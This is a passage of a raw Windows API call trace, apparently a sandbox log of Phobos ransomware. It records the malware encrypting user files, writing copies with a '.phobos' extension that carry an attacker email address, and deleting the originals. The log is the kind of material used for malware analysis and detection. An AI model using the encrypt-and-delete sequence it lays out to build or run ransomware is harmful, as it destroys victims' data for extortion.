0x2020 [0207.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.159] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.159] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.159] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.159] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.159] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x31d, lpOverlapped=0x0) returned 1 [0207.240] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x320, dwBufLen=0x320 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x320) returned 1 [0207.240] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x320, lpOverlapped=0x0) returned 1 [0207.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0207.241] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.241] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0207.241] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.241] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0207.241] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.241] CloseHandle (hObject=0x178) returned 1 [0207.241] CloseHandle (hObject=0xfc) returned 1 [0207.285] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl")) returned 1 [0207.286] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.287] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=785) returned 1 [0207.287] CloseHandle (hObject=0xfc) returned 1 [0207.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl")) returned 0x2020 [0207.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.289] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.289] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.289] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.289] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x311, lpOverlapped=0x0) returned 1 [0207.345] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x320, dwBufLen=0x320 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x320) returned 1 [0207.345] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x320, lpOverlapped=0x0) returned 1 [0207.351] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0207.351] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.351] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0207.351] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.351] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0207.351] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.351] CloseHandle (hObject=0xfc) returned 1 [0207.351] CloseHandle (hObject=0x178) returned 1 [0207.351] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl")) returned 1 [0207.352] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.353] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1040) returned 1 [0207.353] CloseHandle (hObject=0x178) returned 1 [0207.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl")) returned 0x2020 [0207.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.353] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.353] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.354] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.354] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.354] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x410, lpOverlapped=0x0) returned 1 [0207.357] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420, dwBufLen=0x420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420) returned 1 [0207.357] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x420, lpOverlapped=0x0) returned 1 [0207.358] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0207.358] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.358] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0207.358] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.358] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0207.358] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.358] CloseHandle (hObject=0x178) returned 1 [0207.358] CloseHandle (hObject=0xfc) returned 1 [0207.359] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl")) returned 1 [0207.360] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.360] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1020) returned 1 [0207.360] CloseHandle (hObject=0xfc) returned 1 [0207.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl")) returned 0x2020 [0207.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.361] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.361] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.362] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.362] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.362] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3fc, lpOverlapped=0x0) returned 1 [0207.398] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x400, dwBufLen=0x400 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x400) returned 1 [0207.398] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x400, lpOverlapped=0x0) returned 1 [0207.400] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0207.400] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.401] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0207.401] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.401] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0207.401] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.401] CloseHandle (hObject=0xfc) returned 1 [0207.401] CloseHandle (hObject=0x178) returned 1 [0207.401] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl")) returned 1 [0207.402] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.403] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=40960) returned 1 [0207.403] CloseHandle (hObject=0x178) returned 1 [0207.403] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl")) returned 0x2020 [0207.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.404] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.404] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.405] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.405] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.405] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa000, lpOverlapped=0x0) returned 1 [0207.407] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa010, dwBufLen=0xa010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa010) returned 1 [0207.408] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa010, lpOverlapped=0x0) returned 1 [0207.409] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0207.409] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.409] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0207.409] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.409] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0207.432] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.432] CloseHandle (hObject=0x178) returned 1 [0207.432] CloseHandle (hObject=0xfc) returned 1 [0207.432] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl")) returned 1 [0207.433] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG1" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.434] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=46080) returned 1 [0207.434] CloseHandle (hObject=0xfc) returned 1 [0207.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG1" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.log1")) returned 0x2026 [0207.434] GetFileAttributesW 